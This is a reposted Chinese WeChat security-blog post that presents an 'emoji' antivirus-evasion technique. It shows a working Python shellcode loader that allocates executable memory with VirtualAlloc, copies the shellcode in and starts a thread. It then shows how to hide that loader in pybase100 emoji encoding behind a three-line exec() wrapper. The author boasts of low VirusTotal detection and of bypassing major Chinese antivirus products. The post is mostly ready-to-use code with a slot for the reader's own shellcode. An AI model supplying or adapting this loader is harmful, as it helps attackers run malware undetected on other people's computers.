封面回复关键词:007
先看代码:
三行,没错,就这么简单。。
先看一下解码
一步一步来拆解
先介绍这个base100编码
详细的库在这
base100编码
https://pypi.org/project/pybase100/
这个库很简单,就两个函数,decode(解密)和encode(加密)
a='''
shellcode = b"你的shellcode(记得反斜杠)"
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
AV = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(AV), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(AV), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
'''
en = pybase100.encode(a)
print(en.decode())
拿到这段输出的密文,来到这个加载器
import pybase100,ctypes
code = '你的密文'
exec(pybase100.decode(code).decode())
这个项目是寒假的时候写的,当时的vt是4/70
现在再查已经面目全非了,不过依然可以过国内三大厂的
项目更新在:https://github.com/soryecker/base100Bypass/
原文始发于微信公众号(HB网络安全探究实验室):[骚思路免杀]emoji免杀
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论